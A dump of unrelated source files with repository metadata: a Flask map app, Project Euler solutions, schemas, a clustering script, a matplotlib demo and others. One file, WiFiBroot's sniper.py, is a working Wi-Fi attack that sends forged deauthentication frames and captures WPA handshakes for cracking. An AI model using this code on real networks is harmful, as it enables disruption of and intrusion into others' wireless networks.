merged_dict['host'] = csv_e['veranstalter']
merged_dict['mail'] = csv_e['mail']
merged_dict['website'] = csv_e['www']
merged_dict['comments'] = csv_e['bemerkungen']
merged_dict['fee'] = csv_e['Eintrittspreis']
if 'postcode' in json_e['address']:
merged_dict['zip'] = json_e['address']['postcode']
else:
merged_dict['zip'] = csv_e['plz']
merged_dict['lon'] = json_e['lon']
merged_dict['lat'] = json_e['lat']
merged_data.append(merged_dict)
with open('../events.json', 'w') as out:
json.dump(merged_data, out)
| 30.068182 | 58 | 0.640212 |
8f490d241158cbb2263bebb6f96df756bfb7af21
| 4,813 |
py
|
Python
|
flask_mapbox/app.py
|
gaiar/bachelor-beuth-2019
|
391af71bd6ec483b239ed200cee880651cb5396a
|
[
"MIT"
] | null | null | null |
flask_mapbox/app.py
|
gaiar/bachelor-beuth-2019
|
391af71bd6ec483b239ed200cee880651cb5396a
|
[
"MIT"
] | null | null | null |
flask_mapbox/app.py
|
gaiar/bachelor-beuth-2019
|
391af71bd6ec483b239ed200cee880651cb5396a
|
[
"MIT"
] | null | null | null |
import json
import folium
import pandas as pd
import xlrd
import requests
from geojson import Point, Feature
# import geojson
from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash
app = Flask(__name__)
app.config.from_object(__name__)
# read configuration file from the environment variable and get the access key
app.config.from_envvar('APP_CONFIG_FILE', silent=True)
# MAPBOX_ACCESS_KEY = app.config['MAPBOX_ACCESS_KEY']
# geo-coordinate points along the route
ROUTE = [
{"lat": 52.523, "long": 13.413, 'name': 'Berlin', 'admin1code': ''},
{"lat": 52.401, "long": 13.049, 'name': 'Potsdam'},
{"lat": 52.122, "long": 11.619, 'name': 'Magdeburg'},
{"lat": 51.050, "long": 13.739, 'name': 'Dresden'},
{"lat": 50.986, "long": 11.002, 'name': 'Erfurt'},
{"lat": 48.133, "long": 11.567, 'name': 'Muenchen'},
{"lat": 48.783, "long": 9.183, 'name': 'Stuttgart'},
{"lat": 50.100, "long": 8.233, 'name': 'Wiesbaden'},
{"lat": 50.000, "long": 8.267, 'name': 'Mainz'},
{"lat": 49.233, "long": 7.000, 'name': 'Saarbruecken'},
{"lat": 51.233, "long": 6.783, 'name': 'Duesseldorf'},
{"lat": 52.383, "long": 9.733, 'name': 'Hannover'},
{"lat": 53.083, "long": 8.817, 'name': 'Bremen'},
{"lat": 53.567, "long": 10.033, 'name': 'Hamburg'},
{"lat": 54.333, "long": 10.133, 'name': 'Kiel'},
{"lat": 53.628, "long": 11.412, 'name': 'Schwerin'},
]
YEARS=["WS_1998_99",
"WS_1999_00",
"WS_2000_01",
"WS_2001_02",
"WS_2002_03",
"WS_2003_04",
"WS_2004_05",
"WS_2005_06",
"WS_2006_07",
"WS_2007_08",
"WS_2008_09",
"WS_2009_10",
"WS_2010_11",
"WS_2011_12",
"WS_2012_13",
"WS_2013_14",
"WS_2014_15",
"WS_2015_16",
"WS_2016_17"]
# This is the template for the API call:
# https://api.mapbox.com/directions/v5/mapbox/driving/{GEO_COORDINATES_LIST}.json?access_token={MAPBOX_ACCESS_TOKEN}&overview=full&geometries=geojson
# Mapbox driving direction API call
# ROUTE_URL = "https://api.mapbox.com/directions/v5/mapbox/driving/{0}.json?access_token={1}&overview=full&geometries=geojson"
#
# # create the API URL with all of our geo-coordinates and the Mapbox access token
# def create_route_url():
# # Create a string with all the geo coordinates
# lat_longs = ";".join(["{0},{1}".format(point["long"], point["lat"]) for point in ROUTE])
# # Create a url with the geo coordinates and access token
# url = ROUTE_URL.format(lat_longs, MAPBOX_ACCESS_KEY)
#
# return url
#
# # use requests to run the API request and return the results as a GeoJSON object
# def get_route_data():
# # Get the route url
# route_url = create_route_url()
# # Perform a GET request to the route API
# result = requests.get(route_url)
# # Convert the return value to JSON
# data = result.json()
#
# # Create a geo json object from the routing data
# geometry = data["routes"][0]["geometry"]
# route_data = Feature(geometry = geometry, properties = {})
#
# return route_data
with open('data/geo_germany.geojson') as data_file:
state_geo = json.load(data_file)
df = pd.read_excel('data/students_bundesland_gender_foreigner_ws1998_99_ws2016_17.xlsx')
ws_1998_99 = df[df.Semester == 'WS_1998_99']
ws_1999_00 = df[df.Semester == 'WS_1999_00']
ws_2000_01 = df[df.Semester == 'WS_2000_01']
m = folium.Map(location=[52, 13], tiles="Openstreetmap",
zoom_start=6)
st_data = ws_1999_00
# print(st_data)
# print(st_data['Insgesamt, Insgesamt'].min(), st_data['Insgesamt, Insgesamt'].max())
def create_choropleth(geo_data, data, columns, legend, bins):
m.choropleth(
geo_data=geo_data,
name='choropleth',
data=data,
columns=columns,
key_on='feature.properties.NAME_1',
fill_color='OrRd',
fill_opacity=0.7,
line_opacity=0.2,
legend_name=legend,
bins=bins,
highlight=True
)
# for point in range(0, len(coords)):
# m.add_child(folium.Marker(location=coords[point], popup=folium.Popup('Hi')))
folium.LayerControl().add_to(m)
m.save(outfile='templates/map.html')
# route to the new template and send value from url
@app.route('/map/')
@app.route('/map/<year>')
def mapbox_js(year='WS_1998_99'):
# route_data = get_route_data()
df_year = df[df.Semester == year]
print('year:', year)
print(df_year['Insgesamt, Insgesamt'].min(), df_year['Insgesamt, Insgesamt'].max())
create_choropleth(geo_data=state_geo, data=df_year, columns=['Bundesland', 'Insgesamt, Insgesamt'],
legend='Studentenanzahl',
bins=[df_year['Insgesamt, Insgesamt'].min(), 100000, 200000, 300000, 400000,
df_year['Insgesamt, Insgesamt'].max() + 1])
return render_template('index.html', year=year, years=YEARS)
| 34.134752 | 149 | 0.654893 |
56d097d3b8d7980630a156980f25c5b15df2d9da
| 6,432 |
py
|
Python
|
WiFiBroot-master/wireless/sniper.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
WiFiBroot-master/wireless/sniper.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
WiFiBroot-master/wireless/sniper.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from scapy.sendrecv import sniff
from scapy.sendrecv import sendp
from scapy.config import conf
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import RadioTap
from scapy.layers.dot11 import Raw
from scapy.layers.dot11 import Dot11Deauth
from utils import org
import signal
import sys
import time
import threading
import exceptions
import binascii
import os
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
from scapy.layers.eap import EAPOL
class Sniper:
__SNIFFER_STATUS = False
__CONNECTECD_CL = {}
__CL_COUNTER = {}
__c_HANDSHAKE = [0, 0, 0, 0]
__c_TGT = ''
out__ = ['333300000016', '3333ff9ddffd', 'ffffffffffff', '01005e7ffffa', '333300000001', '01005e0000fb']
def __init__(self, iface_instance, bssid, essid, channel, timeout, pully, verbose):
self.iface_instance = iface_instance
self.iface = self.iface_instance.iface
self.bssid = bssid
self.essid = essid
self.ch = channel
self.timeout = timeout
self.pull = pully
self.verbose = verbose
#self.channel_shifter = self.channel_shifter(self.ch)
def __str__(self):
return self.essid
def channel_shifter(self, ch):
self.iface_instance.stop_hopper = 1
while not self.iface_instance._interface__STATUS_END:
time.sleep(1)
self.iface_instance.shift_channel(ch)
def cl_generator(self):
try:
sniff(iface=self.iface, prn=self.cl_generator_replay)
raise KeyboardInterrupt
except KeyboardInterrupt:
if self.verbose:
self.pull.use("Clients %s (%s) - %s[Found %s]%s" % (self.bssid.replace(':', '').upper(), self.pull.DARKCYAN+org(self.bssid).org+self.pull.END,\
self.pull.GREEN, len(self.__CONNECTECD_CL), self.pull.END))
else:
self.pull.use("Clients %s - [Found %s]" % (self.bssid.replace(':', '').upper(), len(self.__CONNECTECD_CL)))
def cl_generator_replay(self, pkt):
if pkt.haslayer(Dot11) and pkt.getlayer(Dot11).type == 2L and not pkt.haslayer(EAPOL):
__sn = pkt.getlayer(Dot11).addr2
__rc = pkt.getlayer(Dot11).addr1
if __sn == self.bssid and not (__sn.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__rc] > 1:
self.__CONNECTECD_CL[__rc] = self.dbM(pkt)
else:
self.__CL_COUNTER[__rc] += 1
except KeyError:
self.__CL_COUNTER[__rc] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
elif __rc == self.bssid and not (__rc.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__sn] > 1:
self.__CONNECTECD_CL[__sn] = self.dbM(pkt)
else:
self.__CL_COUNTER[__sn] += 1
except KeyError:
self.__CL_COUNTER[__sn] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
def clients(self):
pwr__ = []
LIT__ = {self.bssid: []}
for cl, pwr in self.__CONNECTECD_CL.items():
pwr__.append(pwr)
pwr__ = sorted(pwr__, reverse=True)
for pwr in pwr__:
for tuple_ in self.__CONNECTECD_CL.items():
if tuple_[1] == pwr:
if not tuple_[0].startswith('33:33:') or not tuple_[0].startswith('ff:ff:'):
LIT__[self.bssid].append(tuple_)
return LIT__
def dbM(self, pkt):
if pkt.haslayer(RadioTap):
extra = pkt.notdecoded
dbm_sig = -999
for p in extra:
if -(256-ord(p)) > -90 and -(256-ord(p)) < -20:
dbm_sig = -(256-ord(p))
break
return dbm_sig
def verify_handshake(self, tgt):
if 0 not in self.__c_HANDSHAKE:
if len(self.__c_HANDSHAKE):
return 1
else:
return 0
def start_eapol_sniffer(self):
try:
self.__SNIFFER_STATUS = not bool(0)
sniff(iface=self.iface, prn=self.eapol_sniffer_replay)
except ValueError:
pass
def eapol_sniffer_replay(self, pkt):
fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
fMIC = "00000000000000000000000000000000"
if pkt.haslayer(EAPOL):
__sn = pkt[Dot11].addr2
__rc = pkt[Dot11].addr1
to_DS = pkt.getlayer(Dot11).FCfield & 0x1 !=0
from_DS = pkt.getlayer(Dot11).FCfield & 0x2 !=0
if __sn == self.bssid:
tgt = __rc
elif __rc == self.bssid:
tgt = __sn
else:
return
if from_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __sn == self.bssid and nonce != fNONCE and mic == fMIC:
self.__c_HANDSHAKE[0] = pkt
elif __sn == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[2] = pkt
elif to_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __rc == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[1] = pkt
elif __rc == self.bssid and nonce == fNONCE and mic != fMIC:
self.__c_HANDSHAKE[3] = pkt
return
def shoot(self, tgt, deauth, _phaz_instance):
self.__c_TGT = tgt
if not self.__SNIFFER_STATUS:
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(deauth * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
if self.verify_handshake(tgt):
_phaz_instance.THEPOL = tuple(self.__c_HANDSHAKE)
| 34.767568 | 147 | 0.674751 |
a45391c6385c7498426810ce5afb1ac06b5c82be
| 181 |
py
|
Python
|
ProjectEuler_plus/euler_048.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_048.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_048.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
from math import sqrt
N = int(input().strip()) + 1
total = 0
for i in range(1, N):
total += pow(i, i, 10 ** 10)
print(int(str(total)[-10:]))
| 16.454545 | 32 | 0.60221 |
74524aaeb49f0d165ce802410f4d74b67290db0b
| 151 |
py
|
Python
|
Python/Itertools/itertools_permutations.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Python/Itertools/itertools_permutations.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Python/Itertools/itertools_permutations.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
from itertools import permutations
word, k = input().strip().split()
p = [''.join(a) for a in permutations(word, int(k))]
print('\n'.join(sorted(p)))
| 25.166667 | 52 | 0.662252 |
7458b0a76de3d48ff651eb0fde20ecf1b0cbb833
| 926 |
py
|
Python
|
schemas/problem.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | 2 |
2019-06-24T08:34:39.000Z
|
2019-06-27T12:23:47.000Z
|
schemas/problem.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
schemas/problem.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
# encoding:utf-8
save_problem_schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'content': {'type': 'string'},
'time_limit': {'type': 'integer'},
'memory_limit': {'type': 'integer'},
'difficulty' : {'type': 'string'},
'case_list': {'type': 'array'},
'answer_list': {'type': 'array'}
},
'required': ['title', 'content', 'time_limit', 'memory_limit', 'case_list', 'answer_list']
}
update_problem_schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'content': {'type': 'string'},
'time_limit': {'type': 'integer'},
'memory_limit': {'type': 'integer'}
}
}
update_cases_answers_schema = {
'type': 'object',
'properties': {
'case_list': {'type': 'array'},
'answer_list': {'type': 'array'}
},
'required': ['case_list', 'answer_list']
}
| 26.457143 | 94 | 0.515119 |
7761878ba2c1c5ed6e970937a0849fc5746df656
| 327 |
py
|
Python
|
gshiw/quotes_web/manage.py
|
superlead/gsw
|
fc2bb539e3721cc554b4116b553befd653d2ec74
|
[
"MIT"
] | null | null | null |
gshiw/quotes_web/manage.py
|
superlead/gsw
|
fc2bb539e3721cc554b4116b553befd653d2ec74
|
[
"MIT"
] | null | null | null |
gshiw/quotes_web/manage.py
|
superlead/gsw
|
fc2bb539e3721cc554b4116b553befd653d2ec74
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
profile = os.environ.get('QUOTES_WEB_PROFILE', 'develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "quotes_web.settings.%s" % profile)
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 29.727273 | 87 | 0.75841 |
bb28f7ec80ef51c0ffa3ad8fac04c259d92c2d12
| 260 |
py
|
Python
|
models/__init__.py
|
pgmikhael/MLExperiments
|
d3613a70e537ea5aaa0453ddaa76938c32637c49
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
pgmikhael/MLExperiments
|
d3613a70e537ea5aaa0453ddaa76938c32637c49
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
pgmikhael/MLExperiments
|
d3613a70e537ea5aaa0453ddaa76938c32637c49
|
[
"MIT"
] | null | null | null |
from models.trained_models import Resnet18
from models.trained_models import AlexNet
from models.trained_models import VGG16
from models.trained_models import DenseNet161
from models.trained_models import Inception_v3
from models.alexnet import Vanilla_AlexNet
| 43.333333 | 46 | 0.888462 |
bb4cb190b12f8f3deca5ce966bb0c252ffa336e7
| 8,860 |
py
|
Python
|
sanity_check.py
|
koriavinash1/BioExp_Experiments
|
ea556037ed885ebbdbb4b04d43469a0b889fc112
|
[
"BSD-3-Clause"
] | 2 |
2020-11-20T04:28:18.000Z
|
2020-11-23T09:05:43.000Z
|
sanity_check.py
|
koriavinash1/BioExp_Experiments
|
ea556037ed885ebbdbb4b04d43469a0b889fc112
|
[
"BSD-3-Clause"
] | null | null | null |
sanity_check.py
|
koriavinash1/BioExp_Experiments
|
ea556037ed885ebbdbb4b04d43469a0b889fc112
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from keras.models import load_model
import scipy.cluster.hierarchy as shc
from sklearn.cluster import AgglomerativeClustering
import sys
sys.setrecursionlimit(10**6)
import matplotlib.pyplot as plt
sys.path.append('../BioExp')
from BioExp.helpers.metrics import *
from BioExp.helpers.losses import *
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score, davies_bouldin_score, calinski_harabasz_score, silhouette_samples
class Cluster_Characteristics:
def __init__(self, model, layer, weights = None):
self.model = load_model(model, custom_objects={'gen_dice_loss':gen_dice_loss,
'dice_whole_metric':dice_whole_metric,
'dice_core_metric':dice_core_metric,
'dice_en_metric':dice_en_metric})
self.model.load_weights(weights)
self.layer = layer
self.weights = self.model.get_layer(self.layer).get_weights()[0]
self.kmax = None
self.order = 1
def cluster(self, position=False, kmax = 10, km = False, order=1):
flatten_shape = self.weights.shape[0]*self.weights.shape[1]*self.weights.shape[2]
X = self.weights.reshape((flatten_shape, -1))
if position:
position = np.repeat(np.array(list(range(flatten_shape)))[:, None], self.weights.shape[-1], axis = 1)
X = X + position
X = X.transpose()
dist = self.distance_matrix(X, order)
self.scores = {'sil':[], 'cal':[], 'dav':[], 'wss':[]}
for k in range(2, kmax+1):
aggmodel = AgglomerativeClustering(n_clusters = k, affinity='precomputed', linkage='average')
self.cluster_scores(aggmodel, dist, X)
self.kmax = np.argmax(self.scores['sil'])
self.order = order
def cluster_scores(self, model, dist, X):
labels = model.fit_predict(dist)
self.scores['sil'].append(silhouette_score(dist, labels, metric = 'precomputed'))
self.scores['cal'].append(calinski_harabasz_score(X, labels))
self.scores['dav'].append(davies_bouldin_score(X, labels))
# try:
# kmeans = model.fit(X)
# centroids_km = model.cluster_centers_
# pred_clusters_km = model.predict(X)
# curr_sse_km = 0
# # calculate square of Euclidean distance of each point from its cluster center and add to current WSS
# for i in range(len(X)):
# curr_center_km = centroids_km[pred_clusters_km[i]]
# curr_sse_km += np.linalg.norm(X[i] - curr_center_km)**2
# self.scores['wss'].append(curr_sse_km)
# # Calculate silhouette score
# labels = model.labels_
# self.scores['sil'].append(silhouette_score(X, labels_km, metric = 'euclidean'))
def plot_dendrogram(self, X):
plt.figure(figsize=(10, 7))
plt.title("Dendrograms")
dend = shc.dendrogram(shc.linkage(X, method='ward'))
plt.show()
def distance_matrix(self, X, f):
distance_matrix = np.zeros((X.shape[0], X.shape[0]))
for i in range(X.shape[0]):
for j in range(X.shape[0]):
distance_matrix[i][j] = np.linalg.norm(X[i] - X[j], ord = f)
return(distance_matrix)
def plot_silhouette(self, position=False, kmax = 10, model=None):
flatten_shape = self.weights.shape[0]*self.weights.shape[1]*self.weights.shape[2]
X = self.weights.reshape((flatten_shape, -1))
if position:
position = np.repeat(np.array(list(range(flatten_shape)))[:, None], self.weights.shape[-1], axis = 1)
X = X + position
X = X.transpose()
dist = self.distance_matrix(X, self.order)
if self.kmax is not None:
n_clusters = self.kmax + 2
fig = plt.figure()
fig.set_size_inches(10, 5)
plt.xlim([-0.1, 0.3])
plt.ylim([0, len(X) + (n_clusters + 1) * 10])
clusterer = AgglomerativeClustering(n_clusters = n_clusters, affinity='precomputed', linkage='average')
cluster_labels = clusterer.fit_predict(dist)
silhouette_avg = silhouette_score(dist, cluster_labels, metric = 'precomputed')
print("For n_clusters =", n_clusters,
"The average silhouette_score is :", silhouette_avg)
sample_silhouette_values = silhouette_samples(dist, cluster_labels, metric = 'precomputed')
y_lower = 10
for i in range(n_clusters):
# Aggregate the silhouette scores for samples belonging to
# cluster i, and sort them
ith_cluster_silhouette_values = \
sample_silhouette_values[cluster_labels == i]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = plt.cm.nipy_spectral(float(i) / n_clusters)
plt.fill_betweenx(np.arange(y_lower, y_upper),
0, ith_cluster_silhouette_values,
facecolor=color, edgecolor=color, alpha=0.7)
# Label the silhouette plots with their cluster numbers at the middle
plt.text(-0.05, y_lower + 0.5 * size_cluster_i, str(i))
# Compute the new y_lower for next plot
y_lower = y_upper + 10 # 10 for the 0 samples
# ax[idx].set_title("The silhouette plot for the various clusters.")
plt.xlabel("The silhouette coefficient values")
plt.ylabel("Cluster label")
# The vertical line for average silhouette score of all the values
plt.axvline(x=silhouette_avg, color="red", linestyle="--")
plt.yticks([]) # Clear the yaxis labels / ticks
# plt.xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
plt.suptitle(("Silhouette analysis for KMeans clustering on sample data "
"with n_clusters = %d" % n_clusters),
fontsize=14, fontweight='bold')
plt.show()
else:
n_range = range(2, kmax+1)
fig, ax = plt.subplots(len(list(n_range))+1)
fig.set_size_inches(20, 60)
for n_clusters in n_range:
idx = n_clusters - list(n_range)[0]
# The 1st subplot is the silhouette plot
# The silhouette coefficient can range from -1, 1 but in this example all
# lie within [-0.1, 1]
ax[idx].set_xlim([-0.1, 1])
# The (n_clusters+1)*10 is for inserting blank space between silhouette
# plots of individual clusters, to demarcate them clearly.
ax[idx].set_ylim([0, len(X) + (n_clusters + 1) * 10])
# Initialize the clusterer with n_clusters value and a random generator
# seed of 10 for reproducibility.
clusterer = AgglomerativeClustering(n_clusters = n_clusters, affinity='precomputed', linkage='average')
cluster_labels = clusterer.fit_predict(dist)
# The silhouette_score gives the average value for all the samples.
# This gives a perspective into the density and separation of the formed
# clusters
# The silhouette_score gives the average value for all the samples.
# This gives a perspective into the density and separation of the formed
# clusters
silhouette_avg = silhouette_score(dist, cluster_labels, metric = 'precomputed')
print("For n_clusters =", n_clusters,
"The average silhouette_score is :", silhouette_avg)
# Compute the silhouette scores for each sample
sample_silhouette_values = silhouette_samples(dist, cluster_labels, metric = 'precomputed')
y_lower = 10
for i in range(n_clusters):
# Aggregate the silhouette scores for samples belonging to
# cluster i, and sort them
ith_cluster_silhouette_values = \
sample_silhouette_values[cluster_labels == i]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = plt.cm.nipy_spectral(float(i) / n_clusters)
ax[idx].fill_betweenx(np.arange(y_lower, y_upper),
0, ith_cluster_silhouette_values,
facecolor=color, edgecolor=color, alpha=0.7)
# Label the silhouette plots with their cluster numbers at the middle
ax[idx].text(-0.05, y_lower + 0.5 * size_cluster_i, str(i))
# Compute the new y_lower for next plot
y_lower = y_upper + 10 # 10 for the 0 samples
# ax[idx].set_title("The silhouette plot for the various clusters.")
ax[idx].set_xlabel("The silhouette coefficient values")
ax[idx].set_ylabel("Cluster label")
# The vertical line for average silhouette score of all the values
ax[idx].axvline(x=silhouette_avg, color="red", linestyle="--")
ax[idx].set_yticks([]) # Clear the yaxis labels / ticks
ax[idx].set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
plt.suptitle(("Silhouette analysis for KMeans clustering on sample data "
"with n_clusters = %d" % n_clusters),
fontsize=14, fontweight='bold')
plt.show()
if __name__ == "__main__":
C = Cluster_Characteristics('/home/parth/Interpretable_ML/saved_models/model_flair_scaled/model-archi.h5', 'conv2d_15',
weights = '/home/parth/Interpretable_ML/saved_models/model_flair_scaled/model-wts-flair.hdf5')
# sil, sse, cal, dav = C.cluster_scores(position = False)
# print(sil, cal, dav)
C.cluster(position=True, order = 0.1)
C.plot_silhouette(position=True, kmax=10)
| 36.163265 | 120 | 0.690745 |
7022c06f8d43d5c3c5176308f9ab5efd2575229b
| 676 |
py
|
Python
|
数据结构/NowCode/11_PrintListFromTailToHead.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | null | null | null |
数据结构/NowCode/11_PrintListFromTailToHead.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | 3 |
2020-08-14T07:50:27.000Z
|
2020-08-14T08:51:06.000Z
|
数据结构/NowCode/11_PrintListFromTailToHead.py
|
Blankwhiter/LearningNotes
|
83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0
|
[
"MIT"
] | 2 |
2021-03-14T05:58:45.000Z
|
2021-08-29T17:25:52.000Z
|
# 从头到尾打印链表
# 输入一个链表,按链表从尾到头的顺序返回一个ArrayList。
# 链表结构
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# 打印链表
def printChain(head):
node = head
while node:
print(node.val)
node = node.next
class Solution:
# 返回从尾部到头部的列表值序列,例如[1,2,3]
def printListFromTailToHead(self, listNode):
node = listNode
list = []
while node:
list.insert(0, node.val)
node = node.next
return list
if __name__ == '__main__':
# 创建链表
l1 = ListNode(1)
l2 = ListNode(2)
l3 = ListNode(3)
l1.next = l2
l2.next = l3
Solution().printListFromTailToHead(l1)
| 19.882353 | 48 | 0.578402 |
3b8ad2abcb7c1f58219df07a4e525568f15b06ca
| 1,503 |
py
|
Python
|
src/onegov/org/exports/base.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/exports/base.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/exports/base.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.org.models import Export
from onegov.town6 import _
def payment_date_paid(payment):
if not payment.paid:
return
if payment.source == 'manual':
# there is not better way to know for now
return payment.last_change
if payment.source == 'stripe_connect':
# meta-property
return payment.meta.get('payout_date')
class OrgExport(Export):
def payment_items_fields(self, payment, links, provider_title):
yield _("ID Payment Provider"), payment.remote_id
yield _("Status"), _(payment.state.capitalize())
yield _("Currency"), payment.currency
yield _("Amount"), payment.amount
yield _("Net Amount"), round(payment.net_amount, 2)
yield _("Fee"), round(payment.fee, 2)
payment_date = payment_date_paid(payment)
yield _("Payment Provider"), provider_title
yield _("Date Paid"), payment_date and payment_date.date()
yield _("References"), [l.payable_reference for l in links]
yield _("Created Date"), payment.created.date()
def ticket_item_fields(self, ticket):
ha = ticket and ticket.handler
yield _("Reference Ticket"), ticket and ticket.number
yield _("Submitter Email"), ha and ha.email
yield _("Category Ticket"), ticket and ticket.handler_code
yield _("Status Ticket"), ticket and _(ticket.state.capitalize())
yield _("Ticket decided"), ha and (
_('No') if ha.undecided else _('Yes'))
| 37.575 | 73 | 0.654025 |
8eadcfb892024242ba039e682181f3dcac243889
| 771 |
py
|
Python
|
python/en/_matplotlib/gallery/lines_bars_and_markers/masked_demo.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_matplotlib/gallery/lines_bars_and_markers/masked_demo.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_matplotlib/gallery/lines_bars_and_markers/masked_demo.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
lines_bars_and_markers/masked_demo.py
Matplotlib > Gallery > Lines, bars and markers > Masked Demo
https://matplotlib.org/gallery/lines_bars_and_markers/masked_demo.html#sphx-glr-gallery-lines-bars-and-markers-masked-demo-py
"""
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 2*np.pi, 0.02)
y = np.sin(x)
y1 = np.sin(2*x)
y2 = np.sin(3*x)
ym1 = np.ma.masked_where(y1 > 0.5, y1)
ym2 = np.ma.masked_where(y2 < -0.5, y2)
lines = plt.plot(x, y, x, ym1, x, ym2, 'o')
plt.setp(lines[0], linewidth=4)
plt.setp(lines[1], linewidth=2)
plt.setp(lines[2], markersize=10)
plt.legend(('No mask', 'Masked if > 0.5', 'Masked if < -0.5'),
